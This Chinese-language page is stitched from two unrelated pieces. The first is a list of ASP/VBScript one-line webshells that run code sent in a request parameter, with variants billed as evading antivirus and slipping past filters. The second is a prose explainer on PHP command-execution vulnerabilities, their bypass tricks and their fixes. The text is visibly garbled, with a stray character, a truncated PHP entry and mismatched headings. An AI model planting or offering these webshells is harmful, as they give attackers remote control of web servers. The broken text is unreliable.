⑴ 一句話木馬及幾種可繞過過濾格式
2. <%executerequest("YouPass")%> 襲3. <%execute(request("YouPass"))%>免殺大部分網站的一句話 4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>繞過部分網站過濾<%,%>的一句話 5.<script language=VBScript runat=server>execute request("YouPass")</script>繞過部分網站過濾雙引號的一句話 6.<%eval request(YouPass(35))%>php一句話 7.<?>
⑵ 滲透測試——命令執行漏洞(RCE)詳解
命令執行漏洞(RCE)是信息安全領域中一種重要的攻擊手段,它允許攻擊者通過執行不受控制的命令來影響系統或應用的行為。本文旨在深入解析命令執行漏洞的形成原因、利用條件及防範措施。
1. 形成原因:應用中經常需要調用能夠執行系統命令的函數,如 PHP 中的 system、exec、shell_exec 等。當開發者未能嚴格過濾用戶控制的參數時,惡意命令可通過拼接正常命令注入,進而導致命令執行攻擊。
2. 漏洞分類:
要利用命令執行漏洞,需滿足以下條件:
繞過能力的評判取決於攻擊者的技術水平,繞過方式將在後續章節中介紹。
1. 利用系統函數實現命令執行的函數:如 eval、assert、preg_replace、call_user_func 等,如果對用戶輸入未嚴格過濾,可能引發遠程命令執行。
2. 直接執行系統命令的代碼函數:system、exec、shell_exec、passthru 等,需注意參數安全。
命令執行漏洞的關鍵在於命令拼接,惡意命令通常拼接在正常命令後,掌握拼接符號是基礎。以下是常用符號及示例:
1. 通配符:如使用通配符替代命令中的關鍵字元,可繞過部分安全限制。
2. 連接符:如使用引號、反斜杠等來規避安全檢查。
3. 未初始化變數:利用未初始化的變數值為 null,插入命令末尾,繞過黑名單檢測。
命令執行漏洞最常出現在 CMS 框架、插件及應用的其他關鍵位置,這些地方往往需要執行系統命令。
1. 升級框架、插件等至最新版本,打上安全補丁。
2. 關注行業動態,及時修復漏洞。
3. 減少框架/CMS 的使用。
4. 過濾危險符號,減少風險。
5. 安全配置 PHP 相關參數,禁用執行命令的函數。
6. 升級中間件。
7. 嚴格控制傳入變數,避免使用危險的魔法函數。
通過上述方法,開發者可有效防範命令執行漏洞,提升系統安全性。